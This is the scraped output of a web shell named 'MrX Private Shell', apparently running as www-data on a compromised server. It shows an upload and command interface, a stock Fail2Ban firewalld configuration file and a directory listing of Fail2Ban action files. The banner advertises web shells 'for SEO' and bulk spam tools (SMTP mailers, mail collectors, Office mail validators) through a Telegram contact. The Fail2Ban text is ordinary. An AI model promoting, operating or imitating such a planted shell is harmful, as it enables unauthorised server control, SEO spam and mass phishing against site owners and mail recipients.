__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# Fail2Ban configuration file
#
# Author: Donald Yandt
#

[Init]

# Option:  name
# Notes    Default name of the chain
# Values:  STRING
name = default

# Option   port
# Notes    Can also use port numbers separated by a comma and in rich-rules comma and/or space.
# Value    STRING Default: 1:65535
port = 1:65535

# Option:  protocol
# Notes    [ tcp | udp | icmp | all ]
# Values:  STRING Default: tcp
protocol = tcp

# Option:  family(ipv4)
# Notes    specifies the socket address family type
# Values:  STRING  
family = ipv4

# Option:  chain
# Notes    specifies the firewalld chain to which the Fail2Ban rules should be
#          added
# Values:  STRING  Default: INPUT_direct
chain = INPUT_direct

# Option:  zone
# Notes    use command firewall-cmd --get-active-zones to see a list of all active zones. See firewalld man pages for more information on zones
# Values:  STRING  Default: public
zone = public

# Option:  service
# Notes    use command firewall-cmd --get-services to see a list of services available
#          Examples services: amanda-client amanda-k5-client bacula bacula-client dhcp dhcpv6 dhcpv6-client dns freeipa-ldap freeipa-ldaps 
#          freeipa-replication ftp high-availability http https imaps ipp ipp-client ipsec iscsi-target kadmin kerberos 
#          kpasswd ldap ldaps libvirt libvirt-tls mdns mosh mountd ms-wbt mysql nfs ntp openvpn pmcd pmproxy pmwebapi pmwebapis pop3s 
#          postgresql privoxy proxy-dhcp puppetmaster radius rpc-bind rsyncd samba samba-client sane smtp squid ssh synergy 
#          telnet tftp tftp-client tinc tor-socks transmission-client vdsm vnc-server wbem-https xmpp-bosh xmpp-client xmpp-local xmpp-server
# Values:  STRING Default: ssh 
service = ssh

# Option:  rejecttype (ipv4)
# Notes    See iptables/firewalld man pages for ipv4 reject types. 
# Values:  STRING
rejecttype = icmp-port-unreachable

# Option:  blocktype (ipv4/ipv6)
# Notes    See iptables/firewalld man pages for jump targets. Common values are REJECT, 
#          REJECT --reject-with icmp-port-unreachable, DROP
# Values:  STRING
blocktype = REJECT --reject-with <rejecttype>

# Option:  rich-blocktype (ipv4/ipv6)
# Notes    See firewalld man pages for jump targets. Common values are reject, 
#          reject type="icmp-port-unreachable", drop
# Values:  STRING
rich-blocktype = reject type='<rejecttype>'

[Init?family=inet6]

# Option:  family(ipv6)
# Notes    specifies the socket address family type
# Values:  STRING  
family = ipv6

# Option:  rejecttype (ipv6)
# Note:    See iptables/firewalld man pages for ipv6 reject types. 
# Values:  STRING
rejecttype = icmp6-port-unreachable

Filemanager

Name Type Size Permission Actions
abuseipdb.conf File 3.66 KB 0644
apf.conf File 587 B 0644
apprise.conf File 1.38 KB 0644
blocklist_de.conf File 2.65 KB 0644
bsd-ipfw.conf File 3.15 KB 0644
cloudflare-token.conf File 2.93 KB 0644
cloudflare.conf File 2.97 KB 0644
complain.conf File 4.66 KB 0644
dshield.conf File 7.5 KB 0644
dummy.conf File 1.68 KB 0644
firewallcmd-allports.conf File 1.47 KB 0644
firewallcmd-common.conf File 2.59 KB 0644
firewallcmd-ipset.conf File 3.58 KB 0644
firewallcmd-multiport.conf File 1.24 KB 0644
firewallcmd-new.conf File 1.85 KB 0644
firewallcmd-rich-logging.conf File 1021 B 0644
firewallcmd-rich-rules.conf File 1.71 KB 0644
helpers-common.conf File 592 B 0644
hostsdeny.conf File 1.62 KB 0644
ipfilter.conf File 1.54 KB 0644
ipfw.conf File 1.47 KB 0644
iptables-allports.conf File 291 B 0644
iptables-ipset-proto4.conf File 1.93 KB 0644
iptables-ipset-proto6-allports.conf File 814 B 0644
iptables-ipset-proto6.conf File 773 B 0644
iptables-ipset.conf File 2.52 KB 0644
iptables-multiport-log.conf File 2.11 KB 0644
iptables-multiport.conf File 232 B 0644
iptables-new.conf File 332 B 0644
iptables-xt_recent-echo.conf File 2.78 KB 0644
iptables.conf File 4.68 KB 0644
ipthreat.conf File 4.19 KB 0644
mail-buffered.conf File 2.44 KB 0644
mail-whois-common.conf File 1.03 KB 0644
mail-whois-lines.conf File 2.4 KB 0644
mail-whois.conf File 1.85 KB 0644
mail.conf File 1.72 KB 0644
mynetwatchman.conf File 5.2 KB 0644
netscaler.conf File 1.46 KB 0644
nftables-allports.conf File 383 B 0644
nftables-multiport.conf File 384 B 0644
nftables.conf File 6.17 KB 0644
nginx-block-map.conf File 3.92 KB 0644
npf.conf File 1.49 KB 0644
nsupdate.conf File 3.16 KB 0644
osx-afctl.conf File 497 B 0644
osx-ipfw.conf File 2.25 KB 0644
pf.conf File 3.66 KB 0644
route.conf File 1023 B 0644
sendmail-buffered.conf File 2.74 KB 0644
sendmail-common.conf File 1.89 KB 0644
sendmail-geoip-lines.conf File 1.72 KB 0644
sendmail-whois-ipjailmatches.conf File 1.03 KB 0644
sendmail-whois-ipmatches.conf File 1.01 KB 0644
sendmail-whois-lines.conf File 1.27 KB 0644
sendmail-whois-matches.conf File 1000 B 0644
sendmail-whois.conf File 950 B 0644
sendmail.conf File 829 B 0644
shorewall-ipset-proto6.conf File 3.44 KB 0644
shorewall.conf File 2.11 KB 0644
smtp.py File 6.13 KB 0644
symbiosis-blacklist-allports.conf File 1.47 KB 0644
ufw.conf File 2.32 KB 0644
xarf-login-attack.conf File 6.29 KB 0644
Filemanager